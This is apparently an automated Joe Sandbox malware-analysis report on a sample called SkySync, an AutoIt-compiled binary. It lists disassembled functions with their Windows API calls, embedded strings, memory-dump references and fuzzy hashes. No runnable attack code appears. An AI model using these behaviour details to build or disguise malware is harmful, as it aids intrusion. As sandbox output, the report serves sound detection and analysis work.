Instruction Fuzzy Hash: FC31C171611308EFEB22EF94DC84F7977AAEB59356F104159FA01E7190DFB49D408B60

Function 00ACC0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00A9260D
SetTextColor.GDI32(?,000000FF), ref: 00A92617
SetBkMode.GDI32(?,00000001), ref: 00A9262C
GetStockObject.GDI32(00000005), ref: 00A92634
GetClientRect.USER32(?), ref: 00ACC0FC
SendMessageW.USER32(?,00001328,00000000,?), ref: 00ACC113
GetWindowDC.USER32(?), ref: 00ACC11F
GetPixel.GDI32(00000000,?,?), ref: 00ACC12E
ReleaseDC.USER32(?,00000000), ref: 00ACC140
GetSysColor.USER32(00000005), ref: 00ACC15E

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: 65a0ebbe9234953d4e119da6277d33ecbfc6c5856d24019f7d2863524ad5a0b2
Instruction ID: aacc862bfe1db2111629a65ac94ec72e1d3cf7ba532579f93442eda60bcf9dc9
Opcode Fuzzy Hash: 65a0ebbe9234953d4e119da6277d33ecbfc6c5856d24019f7d2863524ad5a0b2
Instruction Fuzzy Hash: B8116D31610205BFDB716FA4EC48BE97BB1EB14322F114265FA69960E2CF310952EF11

Function 00AA29BE Relevance: 14.5, APIs: 2, Strings: 6, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00AB0B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00AA2A3E,?,00008000), ref: 00AB0BA7

Part of subcall function 00AB0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA2A58,?,00008000), ref: 00AB02A4

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00AA2ADF
SetCurrentDirectoryW.KERNEL32(?), ref: 00AA2C2C

Strings

AU3!, xrefs: 00AA2A93
Error opening the file, xrefs: 00ADFD33, 00ADFDAA
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00ADFD17
EA06, xrefs: 00ADFD48
Bad directive syntax error, xrefs: 00AE008F
Unterminated string, xrefs: 00AE00D6

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath
String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 1801377286-3738523708
Opcode ID: 9c91b250922fcbc4c73ef249f1327e76ed4fa3968658ebd25b707bd3801439c3
Instruction ID: aeb832c19ea1277b0c88fa6ea787cd07fb608dad6a311c6f18b6c23cdfafd9d8
Opcode Fuzzy Hash: 9c91b250922fcbc4c73ef249f1327e76ed4fa3968658ebd25b707bd3801439c3
Instruction Fuzzy Hash: B802B5311083419FC724EF24C981AAFBBF5EF9A354F10491EF596972A2DB30DA49CB52

Function 00AEAD69 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00AEB13A), ref: 00AEB078

Strings

REGEXPCLASS, xrefs: 00AEAE3D
TEXT, xrefs: 00AEAFAF
CLASSNN, xrefs: 00AEAE1A
CLASS, xrefs: 00AEADF7
NAME, xrefs: 00AEAEAA
INSTANCE, xrefs: 00AEAF86

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: adeb0f9cfca85250476bfb86c335d8f5c02faa2eb1400be651d89815bc4d7c5f
Instruction ID: 1362754e6aaffba442a2c83b502e59365b9547d484acb4f4d8814e0f7d41eb4d
Opcode Fuzzy Hash: adeb0f9cfca85250476bfb86c335d8f5c02faa2eb1400be651d89815bc4d7c5f
Instruction Fuzzy Hash: F891E571600256EECB08EF61C581BEEFB78BF14310F148119E95AA7292DF307999DBA1

Function 00AFDEDC Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AFE092
SetCurrentDirectoryW.KERNEL32(?), ref: 00AFE0A6
GetFileAttributesW.KERNEL32(?), ref: 00AFE0BE
SetFileAttributesW.KERNEL32(?,00000000), ref: 00AFE0D8
SetCurrentDirectoryW.KERNEL32(?), ref: 00AFE0EA

Strings

*.*, xrefs: 00AFE129

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 3a51b11054d1bfd470cfa15567277c87724e3eaf9612bb84ef5b00561bebccb8
Instruction ID: add03d5c1b2d40bbb2684f7f7fead002c0669a2f80969aadf583d53ba564b2ed
Opcode Fuzzy Hash: 3a51b11054d1bfd470cfa15567277c87724e3eaf9612bb84ef5b00561bebccb8
Instruction Fuzzy Hash: 3081C1716042099FCB25EFA4C844D7AB7E9AF98304F14892EFA8AC7251E730ED45CB52

Function 00A931F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00A9327E

Part of subcall function 00A9218F: GetClientRect.USER32(?,?), ref: 00A921B8
Part of subcall function 00A9218F: GetWindowRect.USER32(?,?), ref: 00A921F9
Part of subcall function 00A9218F: ScreenToClient.USER32(?,?), ref: 00A92221

GetDC.USER32 ref: 00ACD073
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00ACD086
SelectObject.GDI32(00000000,00000000), ref: 00ACD094
SelectObject.GDI32(00000000,00000000), ref: 00ACD0A9
ReleaseDC.USER32(?,00000000), ref: 00ACD0B1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00ACD13C

Strings

U, xrefs: 00ACD011

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: b6b5a07365e2b3ac16e931533c8c5aa6d0ab73ff2189c523f67d6eb21d3c81e9
Instruction ID: 027105e29c19201c37410234f66bf9a10333bc1bdc355afa405be2f2f571af7b
Opcode Fuzzy Hash: b6b5a07365e2b3ac16e931533c8c5aa6d0ab73ff2189c523f67d6eb21d3c81e9
Instruction Fuzzy Hash: 1371CE31600205EFCF219F68C884FEA7BB5FF59320F1542AEED565A1A6CB318942DB60

Function 00AFA48D Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00AFA4D4
LoadStringW.USER32(?,?,00000FFF,?), ref: 00AFA4F6

Strings

Error: , xrefs: 00AFA5E6
"%s" (%d) : ==> %s:%s%s, xrefs: 00AFA619
Line %d (File "%s"):, xrefs: 00AFA549, 00AFA562
^ ERROR, xrefs: 00AFA5C0
"%s" (%d) : ==> %s:, xrefs: 00AFA637

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: LoadString
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2948472770-2391861430
Opcode ID: dbd33c46a2db546eb8e8ab4074983e76a0793073410b8e30c1452371fac4304c
Instruction ID: 1c8a9828d04aca6be2aaa0189a2972eb15de926f63bddee98e13970af7abe200
Opcode Fuzzy Hash: dbd33c46a2db546eb8e8ab4074983e76a0793073410b8e30c1452371fac4304c
Instruction Fuzzy Hash: D1518071940109BACF15EBE0DE86EEEB7B9AF15340F100165F609B30A2EB316F58DB61

Function 00B1C634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A929E2: GetWindowLongW.USER32(?,000000EB), ref: 00A929F3

Part of subcall function 00A92714: GetCursorPos.USER32(?), ref: 00A92727
Part of subcall function 00A92714: ScreenToClient.USER32(00B577B0,?), ref: 00A92744
Part of subcall function 00A92714: GetAsyncKeyState.USER32(00000001), ref: 00A92769
Part of subcall function 00A92714: GetAsyncKeyState.USER32(00000002), ref: 00A92777

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00B1C69C
ImageList_EndDrag.COMCTL32 ref: 00B1C6A2
ReleaseCapture.USER32 ref: 00B1C6A8
SetWindowTextW.USER32(?,00000000), ref: 00B1C752
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00B1C765
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00B1C847

Strings

@GUI_DROPID, xrefs: 00B1C799
@GUI_DRAGFILE, xrefs: 00B1C7DC

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: b1101e454dd6073432e956a7c9ce6cbff5bae588aeace643a3aad3d9ebb27d28
Instruction ID: 4f4f9e1fdc171cf7a9d3374aa0589019191d1f0223d6765dd91772c9188d9fd6
Opcode Fuzzy Hash: b1101e454dd6073432e956a7c9ce6cbff5bae588aeace643a3aad3d9ebb27d28
Instruction Fuzzy Hash: 3A51AE71248304AFDB10EF14DC99FAA7BE5EB88311F00495DF955872E2DF70A945CB52

Function 00B020E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B0211C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B02148
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00B0218A
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00B0219F
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B021AC
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00B021DC
InternetCloseHandle.WININET(00000000), ref: 00B02223

Part of subcall function 00B02B4F: GetLastError.KERNEL32(?,?,00B01EE3,00000000,00000000,00000001), ref: 00B02B64
Part of subcall function 00B02B4F: SetEvent.KERNEL32(?,?,00B01EE3,00000000,00000000,00000001), ref: 00B02B79

Strings

, xrefs: 00B021CD

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 4ba5bac4286dcf34d4472ede662a25f05c821357e5d0a803c0446f28dee64c7d
Instruction ID: c0761ebbbb1f11d72336ec823f873837b086ea4d95cd045ad98bcd3a237c6543
Opcode Fuzzy Hash: 4ba5bac4286dcf34d4472ede662a25f05c821357e5d0a803c0446f28dee64c7d
Instruction Fuzzy Hash: 994151B1501218BFEB169F50CC89FBB7BACFF08354F004156FA059A192DB709D499BA1

Function 00AEFF5C Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00ADFB41,00000010,?,Bad directive syntax error,00B20980,00000000,?,?,?), ref: 00AEFF7D
LoadStringW.USER32(00000000,?,00ADFB41,00000010), ref: 00AEFF84
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00AF0048

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 00AEFFB2
Line %d:, xrefs: 00AEFFD3
Error: , xrefs: 00AF0016
Line %d (File "%s"):, xrefs: 00AEFFEE
., xrefs: 00AF002E

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: HandleLoadMessageModuleString
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 2734547477-4153970271
Opcode ID: 11975879724e12301d4c551597f43ef0da10f7998e57b78c7859c20ad5fdb162
Instruction ID: 15e2e1c79baaa639a218cf60ad8edf041fcfb11101c7e65936763d961114108d
Opcode Fuzzy Hash: 11975879724e12301d4c551597f43ef0da10f7998e57b78c7859c20ad5fdb162
Instruction Fuzzy Hash: 74215E3299021EBBCF11EFD0CD46EEE7779BF15300F044455F515620A2DB71AA28DB51

Function 00AE9D1B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00AE9D27
GetClassNameW.USER32(00000000,?,00000100), ref: 00AE9D3C
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00AE9DC9

Strings

smallicons, xrefs: 00AE9D91
details, xrefs: 00AE9D77
SHELLDLL_DefView, xrefs: 00AE9D48
largeicons, xrefs: 00AE9D5D
list, xrefs: 00AE9DAB

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: bb0f55e85a12e6d35fe7e6349b335046d7c02b227c191a7d1867f3370839b10d
Instruction ID: 6133390a8bfdf3ad404bfe284552173b53557f57a31bfb82b2c32a3c1e7a5b9c
Opcode Fuzzy Hash: bb0f55e85a12e6d35fe7e6349b335046d7c02b227c191a7d1867f3370839b10d
Instruction Fuzzy Hash: B9115577288362BAFE112725FC46DE773ECDB14320B200116FA00A10E2FFA26E556A51

Function 00B09330 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00B20980), ref: 00B09412
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00B20980), ref: 00B09446
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00B095C0
SysFreeString.OLEAUT32(?), ref: 00B095EA

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: c3abbf52c0ab48e89d0bba4371866f893767d90aee8ac2f7b66b6a427d313190
Instruction ID: 43032cb103762f97db8a24b381f3416582f9ba31551a60acbef3ef975ba06a1a
Opcode Fuzzy Hash: c3abbf52c0ab48e89d0bba4371866f893767d90aee8ac2f7b66b6a427d313190
Instruction Fuzzy Hash: E1F12E71A00209EFDF14DF94C884EAEBBB5FF49714F108098F516AB292DB31AE46CB50

Function 00B18C6A Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B18D24

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 249f239ca961ebcd7aac3d06cf391ba623c86cbdca34f447153196e136c92bf1
Instruction ID: 4ddfa770781843f29afe331f852ed69e186aa7790801517d4112782a216f6af5
Opcode Fuzzy Hash: 249f239ca961ebcd7aac3d06cf391ba623c86cbdca34f447153196e136c92bf1
Instruction Fuzzy Hash: 65519F31641204BEEF209F24EC89BD97BE5FB06310FA445A5F614EB1E1CF71A9D09B90

Function 00A92F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00ACC638
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00ACC65A
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00ACC672
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00ACC690
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00ACC6B1
DestroyIcon.USER32(00000000), ref: 00ACC6C0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00ACC6DD
DestroyIcon.USER32(?), ref: 00ACC6EC

Part of subcall function 00B1AAD4: DeleteObject.GDI32(00000000), ref: 00B1AB0D

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 4ff9f9937beeefa9083ea053fbbed2fdb1bc595265d01e1897e64a05449aad76
Instruction ID: c8249f2bcfc5918d47716838eaf168a5d0e52ca340756e07c22b93ba07693923
Opcode Fuzzy Hash: 4ff9f9937beeefa9083ea053fbbed2fdb1bc595265d01e1897e64a05449aad76
Instruction Fuzzy Hash: C1515870A10209AFDF20DF24DD45FAA7BF5EB48721F10452CF94AA76A0DB70ADA1DB50

Function 00AEA226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AEB52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AEB54D
Part of subcall function 00AEB52D: GetCurrentThreadId.KERNEL32 ref: 00AEB554
Part of subcall function 00AEB52D: AttachThreadInput.USER32(00000000,?,00AEA23B,?,00000001), ref: 00AEB55B

MapVirtualKeyW.USER32(00000025,00000000), ref: 00AEA246
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00AEA263
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00AEA266
MapVirtualKeyW.USER32(00000025,00000000), ref: 00AEA26F
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00AEA28D
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00AEA290
MapVirtualKeyW.USER32(00000025,00000000), ref: 00AEA299
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00AEA2B0
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00AEA2B3

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: e96b4210fd277ba26097944bf700b3b8d6c7bc2cb7a627e04ee7e00c89c22629
Instruction ID: 6c4d6d2e76315d5120022cb7eb799349330013b0f791b5c731bd34f5e5cf936c
Opcode Fuzzy Hash: e96b4210fd277ba26097944bf700b3b8d6c7bc2cb7a627e04ee7e00c89c22629
Instruction Fuzzy Hash: 6411E1B1960218BEF6206F659C8AF6A3B2DEB4C751F100419F3406B0E1CEF36C619BB0

Function 00AE94D9 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00AE915A,00000B00,?,?), ref: 00AE94E2
HeapAlloc.KERNEL32(00000000,?,00AE915A,00000B00,?,?), ref: 00AE94E9
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00AE915A,00000B00,?,?), ref: 00AE94FE
GetCurrentProcess.KERNEL32(?,00000000,?,00AE915A,00000B00,?,?), ref: 00AE9506
DuplicateHandle.KERNEL32(00000000,?,00AE915A,00000B00,?,?), ref: 00AE9509
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00AE915A,00000B00,?,?), ref: 00AE9519
GetCurrentProcess.KERNEL32(00AE915A,00000000,?,00AE915A,00000B00,?,?), ref: 00AE9521
DuplicateHandle.KERNEL32(00000000,?,00AE915A,00000B00,?,?), ref: 00AE9524
CreateThread.KERNEL32(00000000,00000000,00AE954A,00000000,00000000,00000000), ref: 00AE953E

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

